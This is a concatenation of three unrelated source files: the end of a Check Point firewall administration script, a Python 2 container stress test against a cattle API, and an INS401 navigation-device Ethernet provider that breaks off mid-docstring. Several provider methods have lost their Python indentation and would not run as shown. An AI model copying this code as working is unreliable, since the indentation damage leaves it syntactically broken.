    print("Executing command:")
    print(cmd)
    print("")
    os.system(cmd)
    print("")
def clear_table_input(fwtab):
    """Prompt for optional src/dst IP filters, then clear matching entries
    from kernel table *fwtab* via clear_table()."""
    print("Please enter common ip addresses. If you wish to disable filter, just")
    print("leave those fields empty.")
    print("")
    ip_src = input("Enter source ip     : ")
    ip_dst = input("Enter destination ip: ")
    print("")
    if ip_src != "":
        iphex_src = ip2hex(ip_src)
        print("Filter: source = " + ip_src + " (" + iphex_src + ")")
    else:
        iphex_src = ""
    if ip_dst != "":
        iphex_dst = ip2hex(ip_dst)
        print("Filter: destination = " + ip_dst + " (" + iphex_dst + ")")
    else:
        iphex_dst = ""
    clear_table(fwtab, iphex_src, iphex_dst)
def clear_table(fwtab, iphex_src = "", iphex_dst = ""):
    """Delete entries from kernel table *fwtab*, optionally filtered by the
    hex-encoded source/destination IP fields; empty filters delete everything.

    Asks for confirmation first; returns False when the user aborts.
    """
    a = input("Should i really CLEAR table? [y/N] ")
    if a.lower() != "y":
        print("Aborting !")
        return False
    # Flatten each entry to its first six comma-separated fields without
    # angle brackets/semicolons, matching `fw tab -x -e` input format.
    out, err = func.execute_command("fw tab -t " + fwtab + " -u | awk 'NR>3 {print $1$2$3$4$5$6}' | sed 's/<//g' | sed 's/>//g' | sed 's/;//g'")
    for line in out:
        delete = False
        conn = line.strip('\n')
        fields = conn.split(',')
        if len(fields) < 5:
            continue
        # Field layout: fields[1] = source IP (hex), fields[3] = destination IP (hex).
        if iphex_src != "":
            if iphex_src == fields[1]:
                delete = True
        if iphex_dst != "":
            if iphex_dst == fields[3]:
                delete = True
        if iphex_src == "" and iphex_dst == "":
            delete = True
        if delete:
            print("-> Deleting Connection: " + conn)
            os.system("fw tab -t " + fwtab + " -x -e " + conn + " >/dev/null 2>&1")
def clusterxl_status():
    """Show ClusterXL state and monitored interfaces."""
    cmd = "cphaprob state ; cphaprob -a if"
    print("")
    print("Executing:")
    print(cmd)
    print("")
    os.system(cmd)

def change_f2f_stats(worker_id, val):
    """Write *val* (1=enable, 0=disable) to a worker's F2F stats proc file."""
    os.system("echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")

def getall_f2f_worker():
    """Return the numeric ids of all fw_worker stats files under /proc/cpkstats."""
    workers = []
    for filename in os.listdir("/proc/cpkstats/"):
        # Match fw_worker_<N>_stats but not the *_raw variants.
        if "fw_worker_" in filename and "_stats" in filename and not "raw" in filename:
            workers.append(int(filename.replace("fw_worker_","").replace("_stats","")))
    return workers
def select_f2f_stats():
    """Prompt for a firewall-worker id and print its F2F statistics.

    Rejects non-numeric input and ids with no matching proc stats file.
    """
    print("")
    # Renamed from `all`, which shadowed the builtin.
    valid_ids = getall_f2f_worker()
    w = input("Enter fw_worker id for statistics: ")
    print("")
    error = False
    try:
        w_i = int(w)
        if w_i not in valid_ids:
            error = True
    except ValueError:
        # Narrowed from a bare except: only non-numeric input is expected here.
        error = True
    if error:
        print("fw_worker id is invalid !")
        print("valid ids are:")
        print(valid_ids)
        return
    print_f2f_stats(w_i)
def print_f2f_stats(worker_id):
    """Live display of the top-15 heaviest F2F (forwarded-to-firewall)
    connections, refreshed every second until CTRL+C.

    worker_id < 0 enables stats on every worker; otherwise only the given
    worker. Debug is switched back off on exit.
    """
    # enabling worker debug for f2f
    if worker_id < 0:
        # print all workers
        workers = getall_f2f_worker()
        for worker in workers:
            print("Enabling Debug on fw_worker[" + str(worker) + "] ...")
            change_f2f_stats(worker, 1)
    else:
        print("Single fw_worker[" + str(worker_id) + "] selected...")
        change_f2f_stats(worker_id, 1)
        workers = []
        workers.append(worker_id)
    output = ""
    stats = []
    stats_sort = []
    CURSOR_UP_ONE = '\x1b[1A'
    ERASE_LINE = '\x1b[2K'
    print(" ")
    print("Entering Loop, press CTRL+C to exit.")
    print("Refreshing statistics every second..")
    print(" ")
    print(" ")
    # Field begins:
    # 2       12        20             35           49
    print("  Worker    Type        Cycles         Time ago     Data")
    print("  ============================================================================================================")
    try:
        while True:
            # Erase the previously printed rows before redrawing.
            for n in stats_sort:
                sys.stdout.write(CURSOR_UP_ONE)
                sys.stdout.write(ERASE_LINE)
            output = ""
            stats.clear()
            for worker in workers:
                # Lines 16..18-ish of the stats file hold the per-type counters.
                for line in func.tail_and_head('/proc/cpkstats/fw_worker_' + str(worker) + '_stats', 18, 16):
                    raw = str(line).replace('\t','').replace('\n','')
                    raw = raw.split()
                    s_worker = worker
                    s_type = raw[0].replace(':','')
                    s_cycles = int(raw[1])
                    s_timeago = int(raw[2])
                    raw = raw[3:]
                    s_data = ' '.join(raw)
                    new = { 'worker': s_worker, 'type': s_type, 'cycles': s_cycles, 'timeago': s_timeago, 'data': s_data }
                    stats.append(new)
            # Heaviest (most cycles) first, keep the top 15.
            stats_sort = sorted(stats, key=lambda k: k['cycles'], reverse=True)
            stats_sort = stats_sort[:15]
            for s in stats_sort:
                output += "  " + func.str_pad(s["worker"], 2) + 10*" " + s["type"] + 5*" " + func.str_pad(s["cycles"], 10, padLeft = True) + 6*" " + func.str_pad(s["timeago"], 3, padLeft = True) + 12*" " + s["data"] + "\n"
            sys.stdout.write(output)
            sys.stdout.flush()
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    print(" ")
    print(" ")
    # disabling worker debug for f2f
    for worker in workers:
        print("Disabling Debug on fw_worker[" + str(worker) + "] ...")
        change_f2f_stats(worker, 0)
|
stress.py | from multiprocessing import Queue, Process
#from Queue import Queue
#from threading import Thread as Process
from cattle import from_env
import time
# NOTE: this module is Python 2 code (print statements, old except syntax).
URL = 'http://mgmt1:8080/v1/schemas'
queue = Queue()  # container ids produced by run(), consumed by progress()
client = from_env(url=URL)
start = time.time()


def progress():
    """Consumer: wait for each queued container to finish transitioning and
    report per-container startup latency; a None id is the stop sentinel."""
    done_count = 0
    error_count = 0
    while True:
        id = queue.get()
        if id is None:
            break
        c = client.by_id_container(id)
        c = client.wait_transitioning(c, timeout=10000)
        if c.state == 'running':
            # Startup latency in seconds (timestamps are in milliseconds).
            print (c.firstRunningTS - c.createdTS)/1000, c.id, c.hosts()[0].name
            done_count += 1
        else:
            error_count += 1
        print time.time(), 'Done:', done_count, 'Error:',\
            error_count, 'Queue:', queue.qsize()
    print 'Total', (time.time() - start)
def run(count=50000, batch=1, interval=1.000):
    """Producer: create *count* containers in batches of *batch*, pacing one
    batch per *interval* seconds, and queue their ids for progress()."""
    client = from_env(url=URL)
    unmanaged_network = client.list_network(uuid='unmanaged')[0]
    #network = client.list_network(uuid='managed-docker0')[0]
    remaining = count
    while remaining > 0:
        start = time.time()
        current_batch = min(batch, remaining)
        try:
            cs = client.create_container(imageUuid='docker:ibuildthecloud/helloworld',
                                         count=current_batch,
                                         networkIds=[unmanaged_network.id],
                                         #networkIds=[network.id],
                                         instanceTriggeredStop='restart',
                                         command='sleep 1000000')
            # A batch > 1 comes back as a collection, a single as one object.
            if cs.type == 'collection':
                for c in cs:
                    print 'Created', remaining, c.id, c.uuid
                    queue.put(c.id)
            else:
                print 'Created', remaining, cs.id, cs.uuid
                queue.put(cs.id)
        except Exception, e:
            print e
        remaining -= current_batch
        # Sleep out the rest of the interval, or report that we fell behind.
        wait = interval - (time.time() - start)
        if wait > 0:
            print 'Sleep', wait
            time.sleep(wait)
        else:
            print 'Fall behind', wait
    # Stop sentinel for the consumer.
    queue.put(None)


# Launch consumer and producer as separate processes.
Process(target=progress).start()
Process(target=run).start()
|
ethernet_provider.py | import os
import struct
import time
import json
import datetime
import threading
import math
import re
import struct
from ..widgets import (NTRIPClient, EthernetDataLogger,
EthernetDebugDataLogger, EthernetRTCMDataLogger)
from ...framework.utils import (helper, resource)
from ...framework.context import APP_CONTEXT
from ...framework.utils.firmware_parser import parser as firmware_content_parser
from ..base.provider_base import OpenDeviceBase
from ..configs.ins401_predefine import (APP_STR, get_ins401_products,
get_configuratin_file_mapping)
from ..decorator import with_device_message
from ...models import InternalCombineAppParseRule
from ..parsers.ins401_field_parser import encode_value
from ...framework.utils.print import (print_yellow, print_green, print_blue)
from ..ins401.mountangle.mountangle import MountAngle
from ..upgrade_workers import (
EthernetSDK9100UpgradeWorker,
FirmwareUpgradeWorker,
JumpBootloaderWorker,
JumpApplicationWorker,
UPGRADE_EVENT,
UPGRADE_GROUP
)
GNZDA_DATA_LEN = 39
class Provider(OpenDeviceBase):
'''
INS401 Ethernet 100base-t1 provider
'''
def __init__(self, communicator, *args):
    """Set up the INS401 provider: defaults, log handles and data folders."""
    super(Provider, self).__init__(communicator)
    self.type = 'INS401'
    self.server_update_rate = 100
    self.sky_data = []
    self.pS_data = []
    self.app_config_folder = ''
    self.device_info = None       # parsed by _build_device_info()
    self.app_info = None          # parsed by _build_app_info()
    self.compile_info = None      # parsed by _build_compile_info()
    self.parameters = None
    self.setting_folder_path = None
    self.data_folder = None
    self.debug_serial_port = None
    self.rtcm_serial_port = None
    # Log file handles; opened elsewhere, None until then.
    self.user_logf = None
    self.debug_logf = None
    self.rtcm_logf = None
    self.debug_c_f = None
    self.enable_data_log = False
    self.is_app_matched = False
    self.ntrip_client_enable = False
    self.nmea_buffer = []
    self.nmea_sync = 0
    self.prepare_folders()
    self.ntrip_client = None
    self.connected = True
    self.rtk_log_file_name = ''
    self.rtcm_rover_logf = None
    # Rotation vector used when the mount angle is large — TODO confirm units.
    self.big_mountangle_rvb = [0, 0, 0]
    self.ins_save_logf = None
    self.ins401_log_file_path = None
    self.mountangle_thread = None
    self.mountangle = None
    self.f_process = None
def prepare_folders(self):
    '''
    Prepare folders for data storage and configuration
    '''
    executor_path = resource.get_executor_path()
    setting_folder_name = 'setting'

    data_folder_path = os.path.join(executor_path, 'data')
    if not os.path.isdir(data_folder_path):
        os.makedirs(data_folder_path)
    self.data_folder = data_folder_path

    # copy contents of app_config under executor path
    self.setting_folder_path = os.path.join(executor_path,
                                            setting_folder_name)

    all_products = get_ins401_products()
    config_file_mapping = get_configuratin_file_mapping()

    # Extract each product/app's bundled config file if not already present.
    for product in all_products:
        product_folder = os.path.join(self.setting_folder_path, product)
        if not os.path.isdir(product_folder):
            os.makedirs(product_folder)

        for app_name in all_products[product]:
            app_name_path = os.path.join(product_folder, app_name)
            app_name_config_path = os.path.join(
                app_name_path, config_file_mapping[product])

            if not os.path.isfile(app_name_config_path):
                if not os.path.isdir(app_name_path):
                    os.makedirs(app_name_path)

                app_config_content = resource.get_content_from_bundle(
                    setting_folder_name,
                    os.path.join(product, app_name,
                                 config_file_mapping[product]))
                # Skip apps whose config is not shipped in the bundle.
                if app_config_content is None:
                    continue

                with open(app_name_config_path, "wb") as code:
                    code.write(app_config_content)
@property
def is_in_bootloader(self):
''' Check if the connected device is in bootloader mode
'''
if not self.app_info or not self.app_info.__contains__('version'):
return False
version = self.app_info['version']
version_splits = version.split(',')
if len(version_splits) == 1:
if 'bootloader' in version_splits[0].lower():
return True
return False
def bind_device_info(self, device_access, device_info, app_info):
self._build_device_info(device_info)
self._build_app_info(app_info)
self.connected = True
self._device_info_string = '# Connected {0} with ethernet #\n\rDevice: {1} \n\rFirmware: {2}'\
.format('INS401', device_info, app_info)
return self._device_info_string
def bind_compile_info(self, compile_info):
compile_info_str = str(compile_info, encoding='utf-8')
compile_info_str = compile_info_str.replace('\x0b','\\')
self._build_compile_info(compile_info_str)
return (compile_info_str)
def _build_compile_info(self, text):
'''
Build compile info
'''
split_text = text.split(',')
self.compile_info = {
'ins_lib':{
'version': split_text[0],
'time': split_text[1],
'author': split_text[2],
'commit':split_text[3]
},
'ins_app':{
'version': split_text[4],
'time': split_text[5],
'author': split_text[6],
'commit':split_text[7]
},
'rtk_lib':{
'version': split_text[8],
'time': split_text[9],
'author': split_text[10],
'commit':split_text[11]
},
'rtk_app':{
'version': split_text[12],
'time': split_text[13],
'author': split_text[14],
'commit':split_text[15]
}
}
print(self.compile_info)
def _build_device_info(self, text):
'''
Build device info
'''
if text.__contains__('SN:'):
split_text = text.split(' ')
sn_split_text = text.split('SN:')
self.device_info = {
'name': split_text[0],
'pn': split_text[2],
'sn': sn_split_text[1]
}
else:
split_text = text.split(' ')
self.device_info = {
'name': split_text[0],
'pn': split_text[1],
'sn': split_text[2],
'hardware':split_text[4]
}
def _build_app_info(self, text):
'''
Build app info
'''
if text.__contains__('SN:'):
self.app_info = {
'version': 'bootloader'
}
return
app_version = text
split_text = app_version.split(' ')
app_name = next((item for item in APP_STR if item in split_text), None)
if not app_name:
app_name = 'RTK_INS'
self.is_app_matched = False
else:
self.is_app_matched = True
self.app_info = {
'app_name': app_name,
'firmware': split_text[2],
'bootloader': split_text[4],
}
    def load_properties(self):
        '''Load the device property set from ins401.json.

        A user-supplied ./ins401.json in the current working directory
        takes precedence; otherwise the bundled per-product settings
        file under the setting folder is used.
        '''
        # Load config from user working path
        local_config_file_path = os.path.join(os.getcwd(), 'ins401.json')
        if os.path.isfile(local_config_file_path):
            with open(local_config_file_path) as json_data:
                self.properties = json.load(json_data)
            return
        # Load the openimu.json based on its app
        product_name = self.device_info['name']
        # NOTE(review): app name is hard-coded; the commented-out lookup
        # suggests per-app selection was intended — confirm
        app_name = 'RTK_INS'  # self.app_info['app_name']
        app_file_path = os.path.join(self.setting_folder_path, product_name,
                                     app_name, 'ins401.json')
        with open(app_file_path) as json_data:
            self.properties = json.load(json_data)
        if not self.is_app_matched:
            print_yellow(
                'Failed to extract app version information from unit.'
            )
    def ntrip_client_thread(self):
        '''Thread body: create the NTRIP client, wire parsed RTCM to
        handle_rtcm_data_parsed, and run the client loop (blocking).
        '''
        self.ntrip_client = NTRIPClient(self.properties)
        self.ntrip_client.on('parsed', self.handle_rtcm_data_parsed)
        # advertise the unit identity to the caster when it is known
        if self.device_info.__contains__('sn') and self.device_info.__contains__('pn'):
            self.ntrip_client.set_connect_headers({
                'Ntrip-Sn': self.device_info['sn'],
                'Ntrip-Pn': self.device_info['pn']
            })
        self.ntrip_client.run()
    def handle_rtcm_data_parsed(self, data):
        '''NTRIP 'parsed' callback: log base-station RTCM and relay it
        to the device over ethernet (packet type 0x02 0x0b).

        Skipped entirely while a firmware upgrade is in progress or has
        failed.
        '''
        # print('rtcm',data)
        if not self.is_upgrading and not self.with_upgrade_error:
            if self.rtcm_logf is not None and data is not None:
                self.rtcm_logf.write(bytes(data))
                self.rtcm_logf.flush()
            if self.communicator.can_write():
                command = helper.build_ethernet_packet(
                    self.communicator.get_dst_mac(),
                    self.communicator.get_src_mac(), b'\x02\x0b', data)
                self.communicator.write(command.actual_command)
    def after_setup(self):
        '''Post-connection setup.

        Creates the per-session log folder and log files, optionally
        pushes predefined user parameters and mount angles, dumps the
        device state, and starts the NTRIP client thread.

        Returns False on failure (any exception); no explicit return on
        success.
        '''
        set_user_para = self.cli_options and self.cli_options.set_user_para
        self.ntrip_client_enable = self.cli_options and self.cli_options.ntrip_client
        # with_raw_log = self.cli_options and self.cli_options.with_raw_log
        set_mount_angle = self.cli_options and self.cli_options.set_mount_angle
        try:
            if self.data_folder:
                dir_time = time.strftime("%Y%m%d_%H%M%S", time.localtime())
                file_time = time.strftime("%Y_%m_%d_%H_%M_%S",
                                          time.localtime())
                file_name = self.data_folder + '/' + 'ins401_log_' + dir_time
                os.mkdir(file_name)
                self.rtk_log_file_name = file_name
                # one session folder holds user/base/rover/ins-save logs
                self.ins401_log_file_path = file_name + '/' + 'user_' + file_time + '.bin'
                self.user_logf = open(self.ins401_log_file_path, "wb")
                self.rtcm_logf = open(
                    file_name + '/' + 'rtcm_base_' + file_time + '.bin', "wb")
                self.rtcm_rover_logf = open(
                    file_name + '/' + 'rtcm_rover_' + file_time + '.bin', "wb")
                self.ins_save_logf = open(
                    file_name + '/' + 'ins_save_' + file_time + '.bin', "wb")
            if set_user_para:
                result = self.set_params(
                    self.properties["initial"]["userParameters"])
                ##print('set user para {0}'.format(result))
                if result['packetType'] == 'success':
                    self.save_config()
                # check saved result
                self.check_predefined_result()
            if set_mount_angle:
                self.set_mount_angle()
                self.prepare_lib_folder()
            if not self.is_in_bootloader:
                result = self.get_ins_message()
                if result['packetType'] == 'success':
                    #print('data = ',bytes(result['data']))
                    self.ins_save_logf.write(bytes(result['raw_data']))
                    self.ins_save_logf.flush()
                else:
                    print('can\'t get ins save message')
                if self.cli_options.debug == 'true':
                    result = self.get_compile_message()
                    if result['packetType'] == 'success':
                        format_compile_info = self.bind_compile_info(
                            result['data'])
                        print_blue(format_compile_info)
                    else:
                        print('can\'t get get_compile_message')
                self.save_device_info()
            # start ntrip client
            if not self.is_upgrading and not self.with_upgrade_error:
                # start ntrip client
                if self.properties["initial"].__contains__("ntrip") \
                        and not self.ntrip_client and not self.is_in_bootloader:
                    threading.Thread(target=self.ntrip_client_thread).start()
        except Exception as e:
            print('Exception in after setup', e)
            return False
def nmea_checksum(self, data):
nmea_str = data[1:len(data) - 2]
nmeadata = nmea_str[0:len(nmea_str)-3]
cksum = nmea_str[len(nmea_str)-2:len(nmea_str)]
calc_cksum = 0
for s in nmeadata:
calc_cksum ^= ord(s)
return int(cksum, 16), calc_cksum
    def on_read_raw(self, data):
        '''Raw ethernet callback for NMEA traffic.

        Filters frames starting with "$G", verifies the sentence
        checksum, forwards GGA sentences to the NTRIP client, and
        appends valid sentences to the user log.
        '''
        # only consider frames beginning with "$G" (0x24 0x47)
        if data[0] != 0x24 or data[1] != 0x47:
            return
        temp_str_nmea = data.decode('utf-8')
        # accept a frame terminated by CRLF, or one whose head is a
        # GNZDA-length sentence (GNZDA_DATA_LEN is a file-level constant)
        if (temp_str_nmea.find("\r\n", len(temp_str_nmea)-2, len(temp_str_nmea)) != -1):
            str_nmea = temp_str_nmea
        elif (temp_str_nmea.find("\r\n", GNZDA_DATA_LEN-2, GNZDA_DATA_LEN) != -1):
            str_nmea = temp_str_nmea[0:GNZDA_DATA_LEN]
        else:
            return
        try:
            cksum, calc_cksum = self.nmea_checksum(str_nmea)
            if cksum == calc_cksum:
                if str_nmea.find("$GPGGA", 0, 6) != -1 or str_nmea.find("$GNGGA", 0, 6) != -1:
                    # GGA fixes feed the NTRIP caster for VRS corrections
                    if self.ntrip_client:
                        self.ntrip_client.send(str_nmea)
                if self.user_logf:
                    self.user_logf.write(data)
                # log the sentence without its trailing CRLF
                APP_CONTEXT.get_print_logger().info(str_nmea[0:len(str_nmea) - 2])
        except Exception as e:
            print('NMEA fault:{0}'.format(e))
            pass
    def thread_data_log(self, *args, **kwargs):
        '''Thread body: run the ethernet user-data logger, writing to
        the user log file (blocking).
        '''
        self.ethernet_data_logger = EthernetDataLogger(self.properties,
                                                       self.communicator,
                                                       self.user_logf)
        self.ethernet_data_logger.run()
    def thread_debug_data_log(self, *args, **kwargs):
        '''Thread body: run the ethernet debug-data logger, writing to
        the debug log file (blocking).
        '''
        self.ethernet_debug_data_logger = EthernetDebugDataLogger(
            self.properties, self.communicator, self.debug_logf)
        self.ethernet_debug_data_logger.run()
    def thread_rtcm_data_log(self, *args, **kwargs):
        '''Thread body: run the ethernet RTCM-data logger, writing to
        the base RTCM log file (blocking).
        '''
        self.ethernet_rtcm_data_logger = EthernetRTCMDataLogger(
            self.properties, self.communicator, self.rtcm_logf)
        self.ethernet_rtcm_data_logger.run()
def set_mountangle_config(self, result = []):
# copy contents of app_config under executor path
setting_folder_path = os.path.join(resource.get_executor_path(),
'setting')
# Load the openimu.json based on its app
product_name = 'INS401'
app_name = 'RTK_INS' # self.app_info['app_name']
app_file_path = os.path.join(setting_folder_path, product_name,
app_name, 'ins401.json')
with open(app_file_path, 'r') as json_data:
self.properties = json.load(json_data)
# update mountangle config file
with open(app_file_path, 'w') as json_data:
userParameters = self.properties["initial"]["userParameters"]
for i in range(3):
userParameters[9 + i]['value'] = result[i]
json.dump(self.properties,
json_data,
indent=4,
ensure_ascii=False)
# setting params
with open(app_file_path, 'r') as json_data:
self.properties = json.load(json_data)
result = self.set_params(self.properties["initial"]["userParameters"])
if result['packetType'] == 'success':
self.save_config()
# check saved result
self.check_predefined_result()
    def save_mountangle_file(self, type, length, content):
        ''' Parse final packet.

        Decodes one output packet and appends its text form to the
        post-process file (self.f_process) consumed by the mount-angle
        estimator.

        :param type: 2-byte packet type id.
        :param length: payload length in bytes.
        :param content: payload bytes as an iterable of ints.
        '''
        if type == b'\x01\n':  # imu
            # <HIffffff — presumably week, ms-of-week, then six float
            # channels (accel/gyro) — TODO confirm field meaning
            b = struct.pack('{0}B'.format(length), *content)
            data = struct.unpack('<HIffffff', b)
            buffer = format(data[0], '') + ","\
                + format(data[1]/1000, '11.4f') + "," + " ,"\
                + format(data[2], '14.10f') + ","\
                + format(data[3], '14.10f') + ","\
                + format(data[4], '14.10f') + ","\
                + format(data[5], '14.10f') + ","\
                + format(data[6], '14.10f') + ","\
                + format(data[7], '14.10f') + "\n"
            self.f_process.write('$GPIMU,' + buffer)
        elif type == b'\x02\n':
            # GNSS solution: emits a $GPGNSS position line and a
            # derived $GPVEL velocity line
            b = struct.pack('{0}B'.format(length), *content)
            data = struct.unpack('<HIBdddfffBBffffffff', b)
            buffer = '$GPGNSS,' + format(data[0], '') + ","\
                + format(data[1]/1000, '11.4f') + ","\
                + format(data[3], '14.9f') + ","\
                + format(data[4], '14.9f') + ","\
                + format(data[5], '10.4f') + ","\
                + format(data[6], '10.4f') + ","\
                + format(data[7], '10.4f') + ","\
                + format(data[8], '10.4f') + ","\
                + format(data[2], '3') + "\n"
            self.f_process.write(buffer)
            # horizontal speed / course over ground from two velocity
            # components; 57.2957... converts radians to degrees
            horizontal_speed = math.sqrt(data[13] * data[13] + data[14] * data[14])
            track_over_ground = math.atan2(data[14], data[13]) * (57.295779513082320)
            buffer = '$GPVEL,' + format(data[0], '') + ","\
                + format(data[1]/1000, '11.4f') + ","\
                + format(horizontal_speed, '10.4f') + ","\
                + format(track_over_ground, '10.4f') + ","\
                + format(data[15], '10.4f') + "\n"
            self.f_process.write(buffer)
        elif type == b'\x03\n':
            # INS solution; record decimated by the ms-of-week test and
            # also fed live to the mount-angle estimator
            b = struct.pack('{0}B'.format(length), *content)
            data = struct.unpack('<HIBBdddfffffffffffffffffff', b)
            if (data[1] % 100) < 10:
                buffer = format(data[0], '') + ","\
                    + format(data[1]/1000, '11.4f') + ","\
                    + format(data[4], '14.9f') + ","\
                    + format(data[5], '14.9f') + ","\
                    + format(data[6], '10.4f') + ","\
                    + format(data[7], '10.4f') + ","\
                    + format(data[8], '10.4f') + ","\
                    + format(data[9], '10.4f') + ","\
                    + format(data[12], '10.4f') + ","\
                    + format(data[13], '10.4f') + ","\
                    + format(data[14], '10.4f') + ","\
                    + format(data[3], '3')
                self.f_process.write('$GPINS,' + buffer + "\n")
                self.mountangle.process_live_data(data, 1)
        elif type == b'\x04\n':
            # odometer packet
            b = struct.pack('{0}B'.format(length), *content)
            data = struct.unpack('<HIBdBQ', b)
            buffer = format(data[0], '') + ","\
                + format(data[1]/1000, '11.4f') + ","\
                + format(data[2], '3') + ","\
                + format(data[3], '10.4f') + ","\
                + format(data[4], '3') + ","\
                + format(data[5], '16') + "\n"
            self.f_process.write('$GPODO,' + buffer)
        elif type == b'\x05\n':
            pass
        elif type == b'\x06\n':  # rover rtcm
            pass
        elif type == b'\x07\n':  # corr imu
            pass
    def mountangle_parse_thread(self):
        '''Thread body: feed the session user log through the MountAngle
        estimator and, once it converges, write the corrected angles
        back to the device, then terminate the whole process.
        '''
        print('processing {0}\n'.format(self.ins401_log_file_path))
        path = mkdir(self.ins401_log_file_path)
        temp_file_path, temp_fname = os.path.split(self.ins401_log_file_path)
        fname, ext = os.path.splitext(temp_fname)
        self.f_process = open(path + '/' + fname + '-process', 'w+')
        self.mountangle = MountAngle(os.getcwd(), path, path + '/' + fname + '-process')
        self.mountangle.mountangle_set_parameters(self.big_mountangle_rvb)
        self.mountangle.mountangle_run()
        while True:
            # idle while the message center is stopped (e.g. upgrading)
            if self._message_center._is_stop:
                time.sleep(1)
                continue
            if self.mountangle.out_result_flag:
                # residual = configured angle - estimated correction,
                # rounded to 4 decimals
                rvb = []
                for i in range(3):
                    f = self.big_mountangle_rvb[i] - self.mountangle.mountangle_estimate_result[i]
                    rvb.append(float('%.4f' % f))
                self.set_mountangle_config(rvb)
                time.sleep(2)
                self.save_device_info()
                time.sleep(2)
                print('mountangle_result:', rvb)
                # NOTE(review): hard process exit once the result is
                # written — confirm this teardown is intended
                os._exit(1)
            time.sleep(5)
def start_mountangle_parse(self):
if self.ins401_log_file_path and self.mountangle_thread is None:
self.mountangle_thread = threading.Thread(target=self.mountangle_parse_thread)
self.mountangle_thread.start()
    def on_receive_output_packet(self, packet_type, data, *args, **kwargs):
        '''
        Listener for getting output packet.

        Rover RTCM (0x06 0x0a) goes to its own log; everything else is
        appended raw to the user log and, while mount-angle estimation
        is active, decoded into the post-process file. The first big
        mount-angle packet (0x07 0x0a) kicks off the parse thread.
        '''
        if packet_type == b'\x06\n':
            if self.rtcm_rover_logf:
                self.rtcm_rover_logf.write(bytes(data))
        else:
            raw_data = kwargs.get('raw')
            if self.user_logf and raw_data:
                self.user_logf.write(bytes(raw_data))
                if self.mountangle:
                    # payload length lives in bytes 4..8 of the frame
                    payload_len = struct.unpack('<I', bytes(raw_data[4:8]))[0]
                    self.save_mountangle_file(packet_type, payload_len, raw_data[8:8+payload_len])
            if packet_type == b'\x07\n':
                if self.cli_options and self.cli_options.set_mount_angle and self.mountangle_thread is None:
                    content = raw_data[8:]
                    # three little-endian doubles at offsets 7/15/23,
                    # converted from radians to degrees
                    big_mountangle_rvb = []
                    for i in range(3):
                        big_mountangle_rvb.append(struct.unpack('<d', bytes(content[7 + 8 * i:15 + 8 * i]))[0])
                    for i in range(3):
                        self.big_mountangle_rvb[i] = big_mountangle_rvb[i] * 57.29577951308232
                    if self.mountangle:
                        self.mountangle.mountangle_logger.debug("[mountangle] big_mountangle_rvb: {0}, {1}, {2}".format(self.big_mountangle_rvb[0], self.big_mountangle_rvb[1], self.big_mountangle_rvb[2]))
                    self.start_mountangle_parse()
    def after_jump_bootloader(self):
        '''Hook run after jumping to bootloader: re-handshake once so
        the new mode is reachable.'''
        self.communicator.reshake_hand()
def do_reshake(self):
'''
check if in application mode
'''
for i in range(100):
try:
result = self.communicator.reshake_hand()
if result:
break
except:
time.sleep(0.5)
continue
    def before_write_content(self, core, content_len):
        '''Send the 'CS' (0x04 0xaa) core-select/content-size command
        before streaming firmware, retrying up to 3 times.

        :param core: target core as a character ('0' or '1').
        :param content_len: total firmware length in bytes (big-endian
            uint32 on the wire).
        Exits the process if the device never acknowledges.
        '''
        command_CS = [0x04, 0xaa]
        message_bytes = [ord('C'), ord(core)]
        message_bytes.extend(struct.pack('>I', content_len))
        self.communicator.reset_buffer()
        for i in range(3):
            command = helper.build_ethernet_packet(
                self.communicator.get_dst_mac(),
                self.communicator.get_src_mac(),
                command_CS, message_bytes,
                use_length_as_protocol=self.communicator.use_length_as_protocol)
            # give the device settle time around the write
            time.sleep(1)
            self.communicator.write(command.actual_command)
            time.sleep(1)
            result = helper.read_untils_have_data(
                self.communicator, command_CS, 100, 200)
            if result:
                break
        if result is None:
            print('send cs command failed, core:{0}'.format(ord(core)))
            # abort: streaming firmware to an unprepared device would
            # brick the target
            os._exit(1)
    def ins_firmware_write_command_generator(self, data_len, current, data):
        '''Build a 'WA' (0x03 0xaa) firmware write packet for the
        INS/RTK core.

        :param data_len: chunk length (big-endian uint32 on the wire).
        :param current: absolute write offset of this chunk.
        :param data: chunk payload bytes.
        '''
        command_WA = [0x03, 0xaa]
        message_bytes = []
        message_bytes.extend(struct.pack('>I', current))
        message_bytes.extend(struct.pack('>I', data_len))
        message_bytes.extend(data)
        return helper.build_ethernet_packet(
            self.communicator.get_dst_mac(),
            self.communicator.get_src_mac(),
            command_WA, message_bytes,
            use_length_as_protocol=self.communicator.use_length_as_protocol)
    def imu_firmware_write_command_generator(self, data_len, current, data):
        '''Build a 'WA' (0x41 0x57) firmware write packet for the IMU.

        Unlike the INS variant, the chunk length is a single byte, and
        the response packet type is the byte-swapped 0x57 0x41.

        :param data_len: chunk length (single byte on the wire).
        :param current: absolute write offset of this chunk.
        :param data: chunk payload bytes.
        '''
        command_WA = [0x41, 0x57]
        message_bytes = []
        message_bytes.extend(struct.pack('>I', current))
        message_bytes.extend(struct.pack('B', data_len))
        message_bytes.extend(data)
        command = helper.build_ethernet_packet(
            self.communicator.get_dst_mac(),
            self.communicator.get_src_mac(),
            command_WA, message_bytes)
        command.packet_type = [0x57, 0x41]
        return command
    def ins_jump_bootloader_command_generator(self):
        '''Build the INS jump-to-bootloader command (0x01 0xaa).'''
        return helper.build_ethernet_packet(
            self.communicator.get_dst_mac(),
            self.communicator.get_src_mac(),
            bytes([0x01, 0xaa]),
            use_length_as_protocol=self.communicator.use_length_as_protocol)
    def ins_jump_application_command_generator(self):
        '''Build the INS jump-to-application command (0x02 0xaa).'''
        return helper.build_ethernet_packet(
            self.communicator.get_dst_mac(),
            self.communicator.get_src_mac(),
            bytes([0x02, 0xaa]),
            use_length_as_protocol=self.communicator.use_length_as_protocol)
    def imu_jump_bootloader_command_generator(self):
        '''Build the IMU jump-to-bootloader command ('IJ', 0x49 0x4a).'''
        return helper.build_ethernet_packet(
            self.communicator.get_dst_mac(),
            self.communicator.get_src_mac(),
            bytes([0x49, 0x4a]))
    def imu_jump_application_command_generator(self):
        '''Build the IMU jump-to-application command ('AJ', 0x41 0x4a).'''
        return helper.build_ethernet_packet(
            self.communicator.get_dst_mac(),
            self.communicator.get_src_mac(),
            bytes([0x41, 0x4a]))
    def build_worker(self, rule, content):
        ''' Build upgrade worker by rule and content.

        :param rule: one of 'rtk', 'ins', 'sdk', 'imu'.
        :param content: firmware bytes for that target.
